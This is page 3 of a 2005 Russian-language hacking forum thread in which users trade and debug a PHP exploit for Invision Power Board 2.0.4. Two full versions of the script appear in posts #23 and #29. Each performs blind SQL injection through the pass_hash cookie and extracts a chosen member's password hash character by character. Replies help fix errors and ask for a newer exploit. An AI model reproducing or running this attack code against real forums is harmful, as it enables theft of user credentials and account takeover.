ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Перезагрузить страницу Исправный сплоит под ИПБ 2.0.4
   
 
Страница 3 из 3 < 1 2 3
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 31.07.2005, 06:09
devil
Новичок
Регистрация: 14.07.2005
Сообщений: 21
Провел на форуме:
16747

Репутация: 0
Отправить сообщение для devil с помощью ICQ
По умолчанию
вся спасибо я нашёл ошибку...только дыру залатали уже -((
 

  #22  
Старый 31.07.2005, 16:06
Loo
Новичок
Регистрация: 01.06.2005
Сообщений: 12
Провел на форуме:
20529

Репутация: 0
По умолчанию
WizART
да слышь, харе уже.....
просто у миня всё было... (актив перл) а LWP не пашет...
devil
ну есессно заделали, не идиоты ведь, навена..
 

  #23  
Старый 31.07.2005, 16:22
Loo
Новичок
Регистрация: 01.06.2005
Сообщений: 12
Провел на форуме:
20529

Репутация: 0
По умолчанию
ладно, поф на юзерагент
объясните, вот тут ошибка в 7 строке пишет, но почему??
<?
set_time_limit(999999);
$zap="http://staff/forum/index.php?act=Login&CODE=autologin" ;
$user=3;
$sh=array("0","1","2","3","4","5","6","7","8","9", "a","b","c ","d","e","f");
$hash=;
for( $i=1; $i <33; $i++ ){
for( $j=0; $j < 16; $j++ ){
$current=$sh[$j];
$sql="99%2527+OR+(id%3d$user+AND+MID(password,$i,1 )%3d%2527$ current%2527)/*";
#$sql="99%2527+OR+(id%3d$user+AND+MID(member_login _key,$i,1) %3d%2527$current%2527)/*";
$cook="pass_hash=$sql;member_id=$user";
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 2);
curl_setopt($ch, CURLOPT_URL, $zap);
curl_setopt($ch, CURLOPT_COOKIE, $cook);
$xyz = curl_exec ($ch);
curl_close ($ch);
if (preg_match("/CODE/i", $xyz)) {
} else {
$hash.=$sh[$j];
}
}
}
echo $hash;
?>
 

  #24  
Старый 31.07.2005, 16:33
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию
М-даа...фатально...
 

  #25  
Старый 27.08.2005, 00:16
Nexwill
Участник форума
Регистрация: 02.08.2005
Сообщений: 172
Провел на форуме:
2049838

Репутация: 100
Отправить сообщение для Nexwill с помощью ICQ
По умолчанию
Подскажите , почему место хеша мне выдаёт такую хрень: ******************
 

  #26  
Старый 27.08.2005, 02:19
ProTeuS
HARDstasy
Регистрация: 26.11.2004
Сообщений: 1,367
Провел на форуме:
4226592

Репутация: 2175


Отправить сообщение для ProTeuS с помощью ICQ
По умолчанию
Цитата:
Сообщение от Nexwill  
Подскажите , почему место хеша мне выдаёт такую хрень: ******************
иЩи АшиПки и правь сплойт!
 

  #27  
Старый 27.08.2005, 09:31
SK | Heaton
Постоянный
Регистрация: 18.06.2005
Сообщений: 872
Провел на форуме:
3007945

Репутация: 765


Отправить сообщение для SK | Heaton с помощью ICQ
По умолчанию
2 ProTeuS нет там общибок просто сплойт старый а форум пропаченный...
вот и выдает ***** или 0000
 

  #28  
Старый 27.08.2005, 11:16
Nexwill
Участник форума
Регистрация: 02.08.2005
Сообщений: 172
Провел на форуме:
2049838

Репутация: 100
Отправить сообщение для Nexwill с помощью ICQ
По умолчанию
А где можно сплоит новый найти?))))
 

  #29  
Старый 27.08.2005, 13:58
nighthunter
Новичок
Регистрация: 26.08.2005
Сообщений: 3
Провел на форуме:
23164

Репутация: 0
По умолчанию
Loo
В скрипте куча ошибок.
Вот с исправлениями:

<?
set_time_limit(0);
$zap='http://.ua/forum/index.php?act=Login&CODE=autologin' ;
$user=1;
$sh=array('0','1','2','3','4','5','6','7','8','9', 'a','b','c','d','e','f');
$hash='';
for( $i=1; $i < 33; $i++ ){
for( $j=0; $j < 16; $j++ ){
$current=$sh[$j];
$sql='99%2527+OR+(id%3d'.$user.'+AND+MID(password, '.$i.',1)%3d%2527'.$current.'%2527)/*';
//Для ИПБ 2.*
//$sql="99%2527+OR+(id%3d$user+AND+MID(member_login_ key,$i,1) %3d%2527$current%2527)/*";
$cook='pass_hash='.$sql.';member_id='.$user.'';
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 2);
curl_setopt($ch, CURLOPT_URL, $zap);
curl_setopt($ch, CURLOPT_COOKIE, $cook);
$xyz = curl_exec($ch);
curl_close ($ch);
if (preg_match("/CODE/i", $xyz)) {
}
else
{
$hash.=$sh[$j];
}
}
}
echo $hash;
?>
 

  #30  
Старый 28.08.2005, 20:05
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию
$crcheck = ""; вот тут ашипка, поставь нужное значение (=$i) между кавычками и будет тебе хеш вместо ****
$crcheck = "=$i";
 
 
Страница 3 из 3 < 1 2 3



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ